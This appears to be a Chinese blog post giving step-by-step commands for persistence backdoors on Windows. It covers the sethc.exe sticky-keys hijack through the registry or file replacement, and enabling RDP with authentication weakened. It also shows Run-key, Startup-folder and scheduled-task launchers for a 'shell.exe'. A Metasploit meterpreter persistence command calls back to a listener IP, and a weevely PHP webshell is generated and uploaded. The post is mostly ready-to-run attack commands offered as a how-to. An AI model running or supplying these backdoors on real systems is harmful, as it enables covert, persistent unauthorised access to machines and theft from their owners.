列举windows通过编程启动exe程序的方法?_一些简单的持久性后门的方法

一,shift后门

方法1:修改注册表-映像劫持

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

c01dd92aa42fb1a9b270de055e5ccd77.png891d15455f479bb806add90e36faadd7.png

命令说明:reg add 是向注册表添加记录,后面跟的是注册表的位置,这里需要注意的是 HKLM 实际上是 HKEY_LOCAL_MACHINE 的缩写。Image File Execution Option 这个目录就是用来设置镜像劫持的,要被劫持的就是命令中的 sethc 粘滞键程序,随后通过 / v 来指定键名,这个键名 debugger 是固定的,然后通过 / t 来指定类型,即 REG_SZ 字符串类型,最后通过 / d 来指定键的值,即被恶意替换的程序,也就是我们的 cmd

开启远程桌面

1,配置防火墙允许远程桌面连接

netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

61ad651e848fefdf70d7eb25ef125068.png891d15455f479bb806add90e36faadd7.png
netsh 是 windows 的网络配置命令,advfirewall firewall 意思是防火墙高级设置,add rule 是添加一条规则,name 指定规则名称,protocol 指定协议,dir 指定是出战还是入站,localport 指定端口,action 指定动作 allow 允许。

2,开启远程桌面

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\TerminalServer" /v fDenyTSConnections /t REG_DWORD /D 0 /f

655f3b622314891f9d27489d88298883.png891d15455f479bb806add90e36faadd7.png

配置远程桌面:

1,UserAuthentication(用户身份验证选项)设置为0

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 

be3a3e5406c433f45616541a5929d6e9.png891d15455f479bb806add90e36faadd7.png

(yes是因为本来就是0,重新写一下) 

1 远程桌面连接之前就进行身份验证

0 远程桌面连接之前不需要进行身份验证,连接到远程桌面的锁屏界面后才进行身份验证

2,securitylayer(安全层)设置为0

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 0

4df05eafd27d3234694f7941a63ce19b.png891d15455f479bb806add90e36faadd7.png
0 就是连接前使用 rdp 协议进行身份验证,rdp 即远程桌面连接,可以简单理解为就是关闭验证。1 是指在连接前两端协商来进行身份验证,这个是默认值。2 就是使用 tls 协议来进行

0  会直接跳转到锁屏界面

1 需要输入用户名后才能跳转到锁屏界面

方法2:直接替换sethc.exe文件

cd C:\windows\system32move sethc.exe sethc.exe.bakcopy cmd.exe sethc.exe

首先查看该目录下是否存在sethc.exe文件 

64eb14c41266c183d34e3dda0806770d.png891d15455f479bb806add90e36faadd7.png

如果目标机是 winvista 以上的,即 winvista 以后出的系统,修改 sethc 会提示需要 trustedinstaller 权限,所以想要继续,那就需要修改所有者为Administrator,并修改其权限:

cd22cd929f38e4ec696a01d12ee4dc1d.png891d15455f479bb806add90e36faadd7.png

 将sethc.exe的所有者更改为本地管理员administrator

1027ed79251d004f7955ac2a057b9d9f.png891d15455f479bb806add90e36faadd7.png

给sethc.exe文件的所有控制权给administrator用户

b9c5772d1f58e29dc4bb58a0dae568a8.png891d15455f479bb806add90e36faadd7.png

将原本的sethc.exe文件进行备份

120578a684759e8667a9e0db8d969c42.png891d15455f479bb806add90e36faadd7.png

用cmd.exe替换sethc.exe

cb6d56d28a85c7fcea9820425ce5e7b4.png891d15455f479bb806add90e36faadd7.png

执行5下shift键,shift后门建立成功。

fbb4bf273a17392290026a7fe2bc1192.png891d15455f479bb806add90e36faadd7.png

二,启动项后门

方法一:注册表添加启动项

注册表位置:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v test /t REG_SZ /d "C:\shell.exe"

/v 指定键名   /t 指定类型,即 REG_SZ 字符串类型  /d 指定键的值

Run 键值代表着开机启动项,也就是说在这个项下的键值会随着开机启动

其实就是将需要执行的后门程序或脚本路径写入到注册表当中,当管理员重新登陆的时候,就会执行后门程序。

5e84bbd7d49a8d9c0ef4a5015a34e94a.png891d15455f479bb806add90e36faadd7.png

方法二:cmd添加启动项

1,切换到启动项目录

cd C:/Users/shy/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/startup/

e38fc1b4f9642dac74319da049160e6c.png891d15455f479bb806add90e36faadd7.png

2,将后门文件或者执行脚本移动到启动项目录下

f63bfdf5ac9cf82ef42dcd6a3a330b0b.png891d15455f479bb806add90e36faadd7.png
3,重启启动启动项

三:计划任务后门

命令:schtasks /Create /tn Updater /tr c:\shell.exe /sc hourly /mo 1

以上的命令会在每小时执行一次shell.exe,在win7及以下的系统使用at命令代替schtasks

四:meterpreter后门

meterpreter > run persistence -U -i 5 -p 1234 -r 192.168.220.128 -A 自动启动一个匹配的exploit / multi / handler来连接到代理 -L 如果未使用%TEMP%,则在目标主机中写入有效负载的位置。-P 有效负载使用,默认为windows / meterpreter / reverse_tcp。-S 作为服务自动启动该木马(具有SYSTEM权限) -T 要使用的备用可执行模板 -U 用户登录时自动启动该木马 -X 系统引导时自动启动该木马 -h 这个帮助菜单 -i 每次连接尝试之间的时间间隔(秒) -p 运行Metasploit的系统正在侦听的端口 -r 运行Metasploit监听连接的系统的IP

五:weevely后门

weevely是一款基于python编写的webshell生成、管理工具。

weevely  generate        生成指定路径带密码的php文件

在shy目录下生成密码为shy的PHP后门文件shy.php      

76192dedca5bbf0d556b34cbf946203d.png891d15455f479bb806add90e36faadd7.png

查看生成的shy.php的内容

91913a4adaf4a038a9d78279442129dd.png891d15455f479bb806add90e36faadd7.png

上传到网站根目录,

c8cb6d0d1555269e349a0a073602b0dd.png891d15455f479bb806add90e36faadd7.png

使用weevely连接

weevely    连接php文件

7c6b53e3f67d0ccecc5989dc9276aaf9.png891d15455f479bb806add90e36faadd7.png

执行系统命令

05a2309e7858c39bf4ed6fce07280097.png891d15455f479bb806add90e36faadd7.png

bfd68ba72827511a61ff5e556dc0cb7d.png

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值